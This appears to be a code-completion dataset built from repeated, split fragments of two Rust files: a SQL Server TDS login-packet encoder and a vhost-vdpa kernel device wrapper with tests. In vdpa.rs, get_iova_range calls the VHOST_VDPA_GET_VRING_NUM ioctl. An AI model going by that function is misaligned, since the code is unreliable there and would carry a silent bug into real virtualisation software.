/// the highest TDS version the client supports
pub tds_version: FeatureLevel,
/// the requested packet size
pub packet_size: u32,
/// the version of the interface library
pub client_prog_ver: u32,
/// the process id of the client application
pub client_pid: u32,
/// the connection id of the primary server
/// (used when connecting to an "Always UP" backup server)
pub connection_id: u32,
pub option_flags_1: LoginOptionFlags1,
pub option_flags_2: LoginOptionFlags2,
/// flag included in option_flags_2
pub integrated_security: Option<Vec<u8>>,
pub type_flags: LoginTypeFlags,
pub option_flags_3: LoginOptionFlags3,
pub client_timezone: i32,
pub client_lcid: u32,
pub hostname: Cow<'a, str>,
pub username: Cow<'a, str>,
pub password: Cow<'a, str>,
pub app_name: Cow<'a, str>,
pub server_name: Cow<'a, str>,
/// the default database to connect to
pub db_name: Cow<'a, str>,
}
impl<'a> LoginMessage<'a> {
pub fn new() -> LoginMessage<'a> {
LoginMessage {
tds_version: FeatureLevel::SqlServerN,
packet_size: 4096,
client_prog_ver: 0,
client_pid: 0,
connection_id: 0,
option_flags_1: LoginOptionFlags1::USE_DB_NOTIFY | LoginOptionFlags1::INITIAL_DB_FATAL,
option_flags_2: LoginOptionFlags2::INIT_LANG_FATAL | LoginOptionFlags2::ODBC_DRIVER,
integrated_security: None,
type_flags: LoginTypeFlags::empty(),
option_flags_3: LoginOptionFlags3::SUPPORT_UNKNOWN_COLL,
client_timezone: 0, //TODO
client_lcid: 0, // TODO
hostname: "".into(),
username: "".into(),
password: "".into(),
app_name: "".into(),
server_name: "".into(),
db_name: "".into(),
}
}
}
impl<'a> Encode<BytesMut> for LoginMessage<'a> {
fn encode(self, dst: &mut BytesMut) -> crate::Result<()> {
let mut cursor = Cursor::new(Vec::with_capacity(512));
// Space for the length
cursor.write_u32::<LittleEndian>(0)?;
// ignore the specified value for integrated security since we determine that by the struct field
let option_flags2 = if self.integrated_security.is_some() {
self.option_flags_2 | LoginOptionFlags2::INTEGRATED_SECURITY
} else {
self.option_flags_2 & !LoginOptionFlags2::INTEGRATED_SECURITY
};
cursor.write_u32::<LittleEndian>(self.tds_version as u32)?;
cursor.write_u32::<LittleEndian>(self.packet_size)?;
cursor.write_u32::<LittleEndian>(self.client_prog_ver)?;
cursor.write_u32::<LittleEndian>(self.client_pid)?;
cursor.write_u32::<LittleEndian>(self.connection_id)?;
cursor.write_u8(self.option_flags_1.bits())?;
cursor.write_u8(option_flags2.bits())?;
cursor.write_u8(self.type_flags.bits())?;
cursor.write_u8(self.option_flags_3.bits())?;
cursor.write_u32::<LittleEndian>(self.client_timezone as u32)?;
cursor.write_u32::<LittleEndian>(self.client_lcid)?;
// variable length data (OffsetLength)
let var_data = [
&self.hostname,
&self.username,
&self.password,
&self.app_name,
&self.server_name,
&"".into(), // 5. ibExtension
&"".into(), // ibCltIntName
&"".into(), // ibLanguage
&self.db_name,
&"".into(), // 9. ClientId (6 bytes); this is included in var_data so we don't lack the bytes of cbSspiLong (4=2*2) and can insert it at the correct position
&"".into(), // 10. ibSSPI
&"".into(), // ibAtchDBFile
&"".into(), // ibChangePassword
];
let mut data_offset = cursor.position() as usize + var_data.len() * 2 * 2 + 6;
for (i, value) in var_data.iter().enumerate() {
// write the client ID (created from the MAC address)
if i == 9 {
cursor.write_u32::<LittleEndian>(0)?; //TODO:
cursor.write_u16::<LittleEndian>(42)?; //TODO: generate real client id
continue;
}
cursor.write_u16::<LittleEndian>(data_offset as u16)?;
// ibSSPI
if i == 10 {
let length = if let Some(ref bytes) = self.integrated_security {
let bak = cursor.position();
cursor.set_position(data_offset as u64);
cursor.write_all(bytes)?;
data_offset += bytes.len();
cursor.set_position(bak);
bytes.len()
} else
|
{
0
}
|
conditional_block
|
|
login.rs
|
003,
/// 2012, 2014, 2016
SqlServerN = 0x74000004,
}
}
bitflags! {
pub struct LoginOptionFlags1: u8 {
const BIG_ENDIAN = 0b00000001;
/// Charset_EBDDIC, default/bit not set = Charset_ASCII
const CHARSET_EBDDIC = 0b00000010;
/// default float is IEEE_754
const FLOAT_VAX = 0b00000100;
const FLOAT_ND5000 = 0b00001000;
const DUMPLOAD_ON = 0b00010000;
/// Set if the client requires warning messages on execution of the USE SQL
/// statement. If this flag is NOT SET, the server MUST NOT inform the client when the database
/// changes, and therefore the client will be unaware of any accompanying collation changes.
const USE_DB_NOTIFY = 0b00100000;
/// Set if the change to initial database needs to succeed if the connection is to succeed. (false: warn)
const INITIAL_DB_FATAL = 0b01000000;
/// Set if the client requires warning messages on execution of a language change statement.
const LANG_CHANGE_WARN = 0b10000000;
}
}
bitflags! {
pub struct LoginOptionFlags2: u8 {
/// Set if the change to initial language needs to succeed if the connect is to succeed.
const INIT_LANG_FATAL = 0b00000001;
/// Set if the client is the ODBC driver. This causes the server to set ANSI_DEFAULTS=ON,
/// CURSOR_CLOSE_ON_COMMIT, IMPLICIT_TRANSACTIONS=OFF, TEXTSIZE=0x7FFFFFFF (2GB) (TDS 7.2 and earlier)
/// TEXTSIZE to infinite (TDS 7.3), and ROWCOUNT to infinite
/// (2.2.6.4)
const ODBC_DRIVER = 0b00000010;
const TRANS_BOUNDARY = 0b00000100;
const CACHE_CONNECT = 0b00001000;
/// reserved
const USER_TYPE_SERVER = 0b00010000;
/// Distributed Query login
const USER_TYPE_REM_USER = 0b00100000;
/// Replication login
const USER_TYPE_SQL_REPL = 0b00110000;
const INTEGRATED_SECURITY = 0b10000000;
}
}
bitflags! {
pub struct LoginTypeFlags: u8 {
/// use TSQL insteadof DFLT
const SQL_TSQL = 0b00000001;
/// Set if the client is the OLEDB driver. This causes the server to set ANSI_DEFAULTS to ON ...
const OLEDB_DRIVER = 0b00010000;
const READ_ONLY_INTENT = 0b00100000;
}
}
bitflags! {
pub struct LoginOptionFlags3: u8 {
const REQUEST_CHANGE_PWD = 0b00000001;
/// 1 if XML data type instances are returned as binary XML
const SEND_YUKON_BINARY = 0b00000010;
/// 1 if client is requesting separate process to be spawned as user instance
const SPAWN_USER_INSTANCE = 0b00000100;
/// 0 = The server MUST restrict the collations sent to a specific set of collations.
/// 1 = The server MAY send any collation that fits in the storage space.
const SUPPORT_UNKNOWN_COLL = 0b00001000;
// TODO: fExtension?
}
}
impl FeatureLevel {
pub fn
|
(self) -> u8 {
if self as u8 >= FeatureLevel::SqlServer2005 as u8 {
8
} else {
4
}
}
}
/// the login packet
pub struct LoginMessage<'a> {
/// the highest TDS version the client supports
pub tds_version: FeatureLevel,
/// the requested packet size
pub packet_size: u32,
/// the version of the interface library
pub client_prog_ver: u32,
/// the process id of the client application
pub client_pid: u32,
/// the connection id of the primary server
/// (used when connecting to an "Always UP" backup server)
pub connection_id: u32,
pub option_flags_1: LoginOptionFlags1,
pub option_flags_2: LoginOptionFlags2,
/// flag included in option_flags_2
pub integrated_security: Option<Vec<u8>>,
pub type_flags: LoginTypeFlags,
pub option_flags_3: LoginOptionFlags3,
pub client_timezone: i32,
pub client_lcid: u32,
pub hostname: Cow<'a, str>,
pub username: Cow<'a, str>,
pub password: Cow<'a, str>,
pub app_name: Cow<'a, str>,
pub server_name: Cow<'a, str>,
/// the default database to connect to
pub db_name: Cow<'a, str>,
}
impl<'a> LoginMessage<'a> {
pub fn new() -> LoginMessage<'a> {
LoginMessage {
tds_version: FeatureLevel::SqlServerN,
packet_size: 4096,
client_prog_ver: 0,
client_pid: 0,
connection_id: 0,
option_flags_1: LoginOptionFlags1::USE_DB_NOTIFY | LoginOptionFlags1::INITIAL_DB_FATAL,
option_flags_2: LoginOptionFlags2::INIT_LANG_FATAL | LoginOptionFlags2::ODBC_DRIVER,
integrated_security: None,
type_flags: LoginTypeFlags::empty(),
option_flags_3: LoginOptionFlags3::SUPPORT_UNKNOWN_COLL,
client_timezone: 0, //TODO
client_lcid: 0, // TODO
hostname: "".into(),
username: "".into(),
password: "".into(),
app_name: "".into(),
server_name: "".into(),
db_name: "".into(),
}
}
}
impl<'a> Encode<BytesMut> for LoginMessage<'a> {
fn encode(self, dst: &mut BytesMut) -> crate::Result<()> {
let mut cursor = Cursor::new(Vec::with_capacity(512));
// Space for the length
cursor.write_u32::<LittleEndian>(0)?;
// ignore the specified value for integrated security since we determine that by the struct field
let option_flags2 = if self.integrated_security.is_some() {
self.option_flags_2 | LoginOptionFlags2::INTEGRATED_SECURITY
} else {
self.option_flags_2 & !LoginOptionFlags2::INTEGRATED_SECURITY
};
cursor.write_u32::<LittleEndian>(self.tds_version as u32)?;
cursor.write_u32::<LittleEndian>(self.packet_size)?;
cursor.write_u32::<LittleEndian>(self.client_prog_ver)?;
cursor.write_u32::<LittleEndian>(self.client_pid)?;
cursor.write_u32::<LittleEndian>(self.connection_id)?;
cursor.write_u8(self.option_flags_1.bits())?;
cursor.write_u8(option_flags2.bits())?;
cursor.write_u8(self.type_flags.bits())?;
cursor.write_u8(self.option_flags_3.bits())?;
cursor.write_u32::<LittleEndian>(self.client_timezone as u32)?;
cursor.write_u32::<LittleEndian>(self.client_lcid)?;
// variable length data (OffsetLength)
let var_data = [
&self.hostname,
&self.username,
&self.password,
&self.app_name,
&self.server_name,
&"".into(), // 5. ibExtension
&"".into(), // ibCltIntName
&"".into(), // ibLanguage
&self.db_name,
&"".into(), // 9. ClientId (6 bytes); this is included in var_data so we don't lack the bytes of cbSspiLong (4=2*2) and can insert it at the correct position
&"".into(), // 10. ibSSPI
&"".into(), // ibAtchDBFile
&"".into(), // ibChangePassword
];
let mut data_offset = cursor.position() as usize + var_data.len() * 2 * 2 + 6;
for (i, value) in var_data.iter().enumerate() {
// write the client ID (created from the MAC address)
if i == 9 {
cursor.write_u32::<LittleEndian>(0)?; //TODO:
cursor.write_u16::<LittleEndian>(42)?; //TODO: generate real client id
|
done_row_count_bytes
|
identifier_name
|
login.rs
|
6
SqlServerN = 0x74000004,
}
}
bitflags! {
pub struct LoginOptionFlags1: u8 {
const BIG_ENDIAN = 0b00000001;
/// Charset_EBDDIC, default/bit not set = Charset_ASCII
const CHARSET_EBDDIC = 0b00000010;
/// default float is IEEE_754
const FLOAT_VAX = 0b00000100;
const FLOAT_ND5000 = 0b00001000;
const DUMPLOAD_ON = 0b00010000;
/// Set if the client requires warning messages on execution of the USE SQL
/// statement. If this flag is NOT SET, the server MUST NOT inform the client when the database
/// changes, and therefore the client will be unaware of any accompanying collation changes.
const USE_DB_NOTIFY = 0b00100000;
/// Set if the change to initial database needs to succeed if the connection is to succeed. (false: warn)
const INITIAL_DB_FATAL = 0b01000000;
/// Set if the client requires warning messages on execution of a language change statement.
const LANG_CHANGE_WARN = 0b10000000;
}
}
bitflags! {
pub struct LoginOptionFlags2: u8 {
/// Set if the change to initial language needs to succeed if the connect is to succeed.
const INIT_LANG_FATAL = 0b00000001;
/// Set if the client is the ODBC driver. This causes the server to set ANSI_DEFAULTS=ON,
/// CURSOR_CLOSE_ON_COMMIT, IMPLICIT_TRANSACTIONS=OFF, TEXTSIZE=0x7FFFFFFF (2GB) (TDS 7.2 and earlier)
/// TEXTSIZE to infinite (TDS 7.3), and ROWCOUNT to infinite
/// (2.2.6.4)
const ODBC_DRIVER = 0b00000010;
const TRANS_BOUNDARY = 0b00000100;
const CACHE_CONNECT = 0b00001000;
/// reserved
const USER_TYPE_SERVER = 0b00010000;
/// Distributed Query login
const USER_TYPE_REM_USER = 0b00100000;
/// Replication login
const USER_TYPE_SQL_REPL = 0b00110000;
const INTEGRATED_SECURITY = 0b10000000;
}
}
bitflags! {
pub struct LoginTypeFlags: u8 {
/// use TSQL insteadof DFLT
const SQL_TSQL = 0b00000001;
/// Set if the client is the OLEDB driver. This causes the server to set ANSI_DEFAULTS to ON ...
const OLEDB_DRIVER = 0b00010000;
const READ_ONLY_INTENT = 0b00100000;
}
}
bitflags! {
pub struct LoginOptionFlags3: u8 {
const REQUEST_CHANGE_PWD = 0b00000001;
/// 1 if XML data type instances are returned as binary XML
const SEND_YUKON_BINARY = 0b00000010;
/// 1 if client is requesting separate process to be spawned as user instance
const SPAWN_USER_INSTANCE = 0b00000100;
/// 0 = The server MUST restrict the collations sent to a specific set of collations.
/// 1 = The server MAY send any collation that fits in the storage space.
const SUPPORT_UNKNOWN_COLL = 0b00001000;
// TODO: fExtension?
}
}
impl FeatureLevel {
pub fn done_row_count_bytes(self) -> u8 {
if self as u8 >= FeatureLevel::SqlServer2005 as u8 {
8
} else {
4
}
}
}
/// the login packet
pub struct LoginMessage<'a> {
/// the highest TDS version the client supports
pub tds_version: FeatureLevel,
/// the requested packet size
pub packet_size: u32,
/// the version of the interface library
pub client_prog_ver: u32,
/// the process id of the client application
pub client_pid: u32,
/// the connection id of the primary server
/// (used when connecting to an "Always UP" backup server)
pub connection_id: u32,
pub option_flags_1: LoginOptionFlags1,
pub option_flags_2: LoginOptionFlags2,
/// flag included in option_flags_2
pub integrated_security: Option<Vec<u8>>,
pub type_flags: LoginTypeFlags,
pub option_flags_3: LoginOptionFlags3,
pub client_timezone: i32,
pub client_lcid: u32,
pub hostname: Cow<'a, str>,
pub username: Cow<'a, str>,
pub password: Cow<'a, str>,
pub app_name: Cow<'a, str>,
pub server_name: Cow<'a, str>,
/// the default database to connect to
pub db_name: Cow<'a, str>,
}
impl<'a> LoginMessage<'a> {
pub fn new() -> LoginMessage<'a> {
LoginMessage {
tds_version: FeatureLevel::SqlServerN,
packet_size: 4096,
client_prog_ver: 0,
client_pid: 0,
connection_id: 0,
option_flags_1: LoginOptionFlags1::USE_DB_NOTIFY | LoginOptionFlags1::INITIAL_DB_FATAL,
option_flags_2: LoginOptionFlags2::INIT_LANG_FATAL | LoginOptionFlags2::ODBC_DRIVER,
integrated_security: None,
type_flags: LoginTypeFlags::empty(),
option_flags_3: LoginOptionFlags3::SUPPORT_UNKNOWN_COLL,
client_timezone: 0, //TODO
client_lcid: 0, // TODO
hostname: "".into(),
username: "".into(),
password: "".into(),
app_name: "".into(),
server_name: "".into(),
db_name: "".into(),
}
}
}
impl<'a> Encode<BytesMut> for LoginMessage<'a> {
fn encode(self, dst: &mut BytesMut) -> crate::Result<()> {
let mut cursor = Cursor::new(Vec::with_capacity(512));
// Space for the length
cursor.write_u32::<LittleEndian>(0)?;
// ignore the specified value for integrated security since we determine that by the struct field
let option_flags2 = if self.integrated_security.is_some() {
self.option_flags_2 | LoginOptionFlags2::INTEGRATED_SECURITY
} else {
self.option_flags_2 & !LoginOptionFlags2::INTEGRATED_SECURITY
};
cursor.write_u32::<LittleEndian>(self.tds_version as u32)?;
cursor.write_u32::<LittleEndian>(self.packet_size)?;
cursor.write_u32::<LittleEndian>(self.client_prog_ver)?;
cursor.write_u32::<LittleEndian>(self.client_pid)?;
cursor.write_u32::<LittleEndian>(self.connection_id)?;
cursor.write_u8(self.option_flags_1.bits())?;
cursor.write_u8(option_flags2.bits())?;
cursor.write_u8(self.type_flags.bits())?;
cursor.write_u8(self.option_flags_3.bits())?;
cursor.write_u32::<LittleEndian>(self.client_timezone as u32)?;
cursor.write_u32::<LittleEndian>(self.client_lcid)?;
// variable length data (OffsetLength)
let var_data = [
&self.hostname,
&self.username,
&self.password,
&self.app_name,
&self.server_name,
&"".into(), // 5. ibExtension
&"".into(), // ibCltIntName
&"".into(), // ibLanguage
&self.db_name,
&"".into(), // 9. ClientId (6 bytes); this is included in var_data so we don't lack the bytes of cbSspiLong (4=2*2) and can insert it at the correct position
&"".into(), // 10. ibSSPI
&"".into(), // ibAtchDBFile
&"".into(), // ibChangePassword
];
let mut data_offset = cursor.position() as usize + var_data.len() * 2 * 2 + 6;
for (i, value) in var_data.iter().enumerate() {
// write the client ID (created from the MAC address)
if i == 9 {
cursor.write_u32::<LittleEndian>(0)?; //TODO:
cursor.write_u16::<LittleEndian>(42)?; //TODO: generate real client id
continue;
}
|
cursor.write_u16::<LittleEndian>(data_offset as u16)?;
|
random_line_split
|
|
vdpa.rs
|
Vdpa {
fd: OpenOptions::new()
.read(true)
.write(true)
.custom_flags(libc::O_CLOEXEC | libc::O_NONBLOCK)
.open(path)
.map_err(Error::VhostOpen)?,
mem,
backend_features_acked: 0,
})
}
}
impl<AS: GuestAddressSpace> VhostVdpa for VhostKernVdpa<AS> {
fn get_device_id(&self) -> Result<u32> {
let mut device_id: u32 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_DEVICE_ID(), &mut device_id) };
ioctl_result(ret, device_id)
}
fn get_status(&self) -> Result<u8> {
let mut status: u8 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_STATUS(), &mut status) };
ioctl_result(ret, status)
}
fn set_status(&self, status: u8) -> Result<()> {
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_STATUS(), &status) };
ioctl_result(ret, ())
}
fn get_config(&self, offset: u32, buffer: &mut [u8]) -> Result<()> {
let mut config = VhostVdpaConfig::new(buffer.len())
.map_err(|_| Error::IoctlError(IOError::from_raw_os_error(libc::ENOMEM)))?;
config.as_mut_fam_struct().off = offset;
let ret = unsafe {
ioctl_with_ptr(
self,
VHOST_VDPA_GET_CONFIG(),
config.as_mut_fam_struct_ptr(),
)
};
buffer.copy_from_slice(config.as_slice());
ioctl_result(ret, ())
}
fn set_config(&self, offset: u32, buffer: &[u8]) -> Result<()> {
let mut config = VhostVdpaConfig::new(buffer.len())
.map_err(|_| Error::IoctlError(IOError::from_raw_os_error(libc::ENOMEM)))?;
config.as_mut_fam_struct().off = offset;
config.as_mut_slice().copy_from_slice(buffer);
let ret =
unsafe { ioctl_with_ptr(self, VHOST_VDPA_SET_CONFIG(), config.as_fam_struct_ptr()) };
ioctl_result(ret, ())
}
fn set_vring_enable(&self, queue_index: usize, enabled: bool) -> Result<()> {
let vring_state = vhost_vring_state {
index: queue_index as u32,
num: enabled as u32,
};
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_VRING_ENABLE(), &vring_state) };
ioctl_result(ret, ())
}
fn get_vring_num(&self) -> Result<u16> {
let mut vring_num: u16 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_VRING_NUM(), &mut vring_num) };
ioctl_result(ret, vring_num)
}
fn set_config_call(&self, fd: &EventFd) -> Result<()> {
let event_fd: ::std::os::raw::c_int = fd.as_raw_fd();
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_CONFIG_CALL(), &event_fd) };
ioctl_result(ret, ())
}
fn get_iova_range(&self) -> Result<VhostVdpaIovaRange> {
let mut low_iova_range = vhost_vdpa_iova_range { first: 0, last: 0 };
let ret =
unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_VRING_NUM(), &mut low_iova_range) };
let iova_range = VhostVdpaIovaRange {
first: low_iova_range.first,
last: low_iova_range.last,
};
ioctl_result(ret, iova_range)
}
fn dma_map(&self, iova: u64, size: u64, vaddr: *const u8, readonly: bool) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
userspace_addr: vaddr as u64,
perm: match readonly {
true => VhostAccess::ReadOnly,
false => VhostAccess::ReadWrite,
},
msg_type: VhostIotlbType::Update,
};
self.send_iotlb_msg(&iotlb)
}
fn dma_unmap(&self, iova: u64, size: u64) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
msg_type: VhostIotlbType::Invalidate,
..Default::default()
};
self.send_iotlb_msg(&iotlb)
}
}
impl<AS: GuestAddressSpace> VhostKernBackend for VhostKernVdpa<AS> {
type AS = AS;
fn mem(&self) -> &Self::AS {
&self.mem
}
}
impl<AS: GuestAddressSpace> AsRawFd for VhostKernVdpa<AS> {
fn as_raw_fd(&self) -> RawFd {
self.fd.as_raw_fd()
}
}
impl<AS: GuestAddressSpace> VhostKernFeatures for VhostKernVdpa<AS> {
fn
|
(&self) -> u64 {
self.backend_features_acked
}
fn set_backend_features_acked(&mut self, features: u64) {
self.backend_features_acked = features;
}
}
#[cfg(test)]
mod tests {
const VHOST_VDPA_PATH: &str = "/dev/vhost-vdpa-0";
use std::alloc::{alloc, dealloc, Layout};
use vm_memory::{GuestAddress, GuestMemory, GuestMemoryMmap};
use vmm_sys_util::eventfd::EventFd;
use super::*;
use crate::{
VhostBackend, VhostUserDirtyLogRegion, VhostUserMemoryRegionInfo, VringConfigData,
};
use serial_test::serial;
use std::io::ErrorKind;
/// macro to skip test if vhost-vdpa device path is not found.
///
/// vDPA simulators are available since Linux 5.7, but the CI may have
/// an older kernel, so for now we skip the test if we don't find
/// the device.
macro_rules! unwrap_not_found {
( $e:expr ) => {
match $e {
Ok(v) => v,
Err(error) => match error {
Error::VhostOpen(ref e) if e.kind() == ErrorKind::NotFound => {
println!("Err: {:?} SKIPPED", e);
return;
}
e => panic!("Err: {:?}", e),
},
}
};
}
#[test]
#[serial]
fn test_vdpa_kern_new_device() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
assert!(vdpa.as_raw_fd() >= 0);
assert!(vdpa.mem().find_region(GuestAddress(0x100)).is_some());
assert!(vdpa.mem().find_region(GuestAddress(0x10_0000)).is_none());
}
#[test]
#[serial]
fn test_vdpa_kern_is_valid() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let mut config = VringConfigData {
queue_max_size: 32,
queue_size: 32,
flags: 0,
desc_table_addr: 0x1000,
used_ring_addr: 0x2000,
avail_ring_addr: 0x3000,
log_addr: None,
};
assert_eq!(vdpa.is_valid(&config), true);
config.queue_size = 0;
assert_eq!(vdpa.is_valid(&config), false);
config.queue_size = 31;
assert_eq!(vdpa.is_valid(&config), false);
config.queue_size = 33;
assert_eq!(vdpa.is_valid(&config), false);
}
#[test]
#[serial]
fn test_vdpa_kern_ioctls() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let features = vdpa.get_features().unwrap();
// VIRTIO_F_VERSION_1 (bit 32) should be set
assert_ne!(features & (1 << 32),
|
get_backend_features_acked
|
identifier_name
|
vdpa.rs
|
fn set_config(&self, offset: u32, buffer: &[u8]) -> Result<()> {
let mut config = VhostVdpaConfig::new(buffer.len())
.map_err(|_| Error::IoctlError(IOError::from_raw_os_error(libc::ENOMEM)))?;
config.as_mut_fam_struct().off = offset;
config.as_mut_slice().copy_from_slice(buffer);
let ret =
unsafe { ioctl_with_ptr(self, VHOST_VDPA_SET_CONFIG(), config.as_fam_struct_ptr()) };
ioctl_result(ret, ())
}
fn set_vring_enable(&self, queue_index: usize, enabled: bool) -> Result<()> {
let vring_state = vhost_vring_state {
index: queue_index as u32,
num: enabled as u32,
};
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_VRING_ENABLE(), &vring_state) };
ioctl_result(ret, ())
}
fn get_vring_num(&self) -> Result<u16> {
let mut vring_num: u16 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_VRING_NUM(), &mut vring_num) };
ioctl_result(ret, vring_num)
}
fn set_config_call(&self, fd: &EventFd) -> Result<()> {
let event_fd: ::std::os::raw::c_int = fd.as_raw_fd();
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_CONFIG_CALL(), &event_fd) };
ioctl_result(ret, ())
}
fn get_iova_range(&self) -> Result<VhostVdpaIovaRange> {
let mut low_iova_range = vhost_vdpa_iova_range { first: 0, last: 0 };
let ret =
unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_VRING_NUM(), &mut low_iova_range) };
let iova_range = VhostVdpaIovaRange {
first: low_iova_range.first,
last: low_iova_range.last,
};
ioctl_result(ret, iova_range)
}
fn dma_map(&self, iova: u64, size: u64, vaddr: *const u8, readonly: bool) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
userspace_addr: vaddr as u64,
perm: match readonly {
true => VhostAccess::ReadOnly,
false => VhostAccess::ReadWrite,
},
msg_type: VhostIotlbType::Update,
};
self.send_iotlb_msg(&iotlb)
}
fn dma_unmap(&self, iova: u64, size: u64) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
msg_type: VhostIotlbType::Invalidate,
..Default::default()
};
self.send_iotlb_msg(&iotlb)
}
}
impl<AS: GuestAddressSpace> VhostKernBackend for VhostKernVdpa<AS> {
type AS = AS;
fn mem(&self) -> &Self::AS {
&self.mem
}
}
impl<AS: GuestAddressSpace> AsRawFd for VhostKernVdpa<AS> {
fn as_raw_fd(&self) -> RawFd {
self.fd.as_raw_fd()
}
}
impl<AS: GuestAddressSpace> VhostKernFeatures for VhostKernVdpa<AS> {
fn get_backend_features_acked(&self) -> u64 {
self.backend_features_acked
}
fn set_backend_features_acked(&mut self, features: u64) {
self.backend_features_acked = features;
}
}
#[cfg(test)]
mod tests {
const VHOST_VDPA_PATH: &str = "/dev/vhost-vdpa-0";
use std::alloc::{alloc, dealloc, Layout};
use vm_memory::{GuestAddress, GuestMemory, GuestMemoryMmap};
use vmm_sys_util::eventfd::EventFd;
use super::*;
use crate::{
VhostBackend, VhostUserDirtyLogRegion, VhostUserMemoryRegionInfo, VringConfigData,
};
use serial_test::serial;
use std::io::ErrorKind;
/// macro to skip test if vhost-vdpa device path is not found.
///
/// vDPA simulators are available since Linux 5.7, but the CI may have
/// an older kernel, so for now we skip the test if we don't find
/// the device.
macro_rules! unwrap_not_found {
( $e:expr ) => {
match $e {
Ok(v) => v,
Err(error) => match error {
Error::VhostOpen(ref e) if e.kind() == ErrorKind::NotFound => {
println!("Err: {:?} SKIPPED", e);
return;
}
e => panic!("Err: {:?}", e),
},
}
};
}
#[test]
#[serial]
fn test_vdpa_kern_new_device() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
assert!(vdpa.as_raw_fd() >= 0);
assert!(vdpa.mem().find_region(GuestAddress(0x100)).is_some());
assert!(vdpa.mem().find_region(GuestAddress(0x10_0000)).is_none());
}
#[test]
#[serial]
fn test_vdpa_kern_is_valid() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let mut config = VringConfigData {
queue_max_size: 32,
queue_size: 32,
flags: 0,
desc_table_addr: 0x1000,
used_ring_addr: 0x2000,
avail_ring_addr: 0x3000,
log_addr: None,
};
assert_eq!(vdpa.is_valid(&config), true);
config.queue_size = 0;
assert_eq!(vdpa.is_valid(&config), false);
config.queue_size = 31;
assert_eq!(vdpa.is_valid(&config), false);
config.queue_size = 33;
assert_eq!(vdpa.is_valid(&config), false);
}
#[test]
#[serial]
fn test_vdpa_kern_ioctls() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let features = vdpa.get_features().unwrap();
// VIRTIO_F_VERSION_1 (bit 32) should be set
assert_ne!(features & (1 << 32), 0);
vdpa.set_features(features).unwrap();
vdpa.set_owner().unwrap();
vdpa.set_mem_table(&[]).unwrap_err();
let region = VhostUserMemoryRegionInfo {
guest_phys_addr: 0x0,
memory_size: 0x10_0000,
userspace_addr: m.get_host_address(GuestAddress(0x0)).unwrap() as u64,
mmap_offset: 0,
mmap_handle: -1,
};
vdpa.set_mem_table(&[region]).unwrap();
assert!(vdpa.get_device_id().unwrap() > 0);
assert_eq!(vdpa.get_status().unwrap(), 0x0);
vdpa.set_status(0x1).unwrap();
assert_eq!(vdpa.get_status().unwrap(), 0x1);
let mut vec = vec![0u8; 8];
vdpa.get_config(0, &mut vec).unwrap();
vdpa.set_config(0, &vec).unwrap();
let eventfd = EventFd::new(0).unwrap();
// set_log_base() and set_log_fd() are not supported by vhost-vdpa
vdpa.set_log_base(
0x4000,
Some(VhostUserDirtyLogRegion {
mmap_size: 0x1000,
mmap_offset: 0x10,
mmap_handle: 1,
}),
)
.unwrap_err();
vdpa.set_log_base(0x4000, None).unwrap_err();
vdpa.set_log_fd(eventfd.as_raw_fd()).unwrap_err();
let max_queues = vdpa.get_vring_num().unwrap();
vdpa.set_vring_num(0, max_queues + 1).unwrap_err();
vdpa.set_vring_num(0, 32).unwrap();
|
random_line_split
|
||
vdpa.rs
|
Vdpa {
fd: OpenOptions::new()
.read(true)
.write(true)
.custom_flags(libc::O_CLOEXEC | libc::O_NONBLOCK)
.open(path)
.map_err(Error::VhostOpen)?,
mem,
backend_features_acked: 0,
})
}
}
impl<AS: GuestAddressSpace> VhostVdpa for VhostKernVdpa<AS> {
fn get_device_id(&self) -> Result<u32> {
let mut device_id: u32 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_DEVICE_ID(), &mut device_id) };
ioctl_result(ret, device_id)
}
fn get_status(&self) -> Result<u8> {
let mut status: u8 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_STATUS(), &mut status) };
ioctl_result(ret, status)
}
fn set_status(&self, status: u8) -> Result<()> {
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_STATUS(), &status) };
ioctl_result(ret, ())
}
fn get_config(&self, offset: u32, buffer: &mut [u8]) -> Result<()> {
let mut config = VhostVdpaConfig::new(buffer.len())
.map_err(|_| Error::IoctlError(IOError::from_raw_os_error(libc::ENOMEM)))?;
config.as_mut_fam_struct().off = offset;
let ret = unsafe {
ioctl_with_ptr(
self,
VHOST_VDPA_GET_CONFIG(),
config.as_mut_fam_struct_ptr(),
)
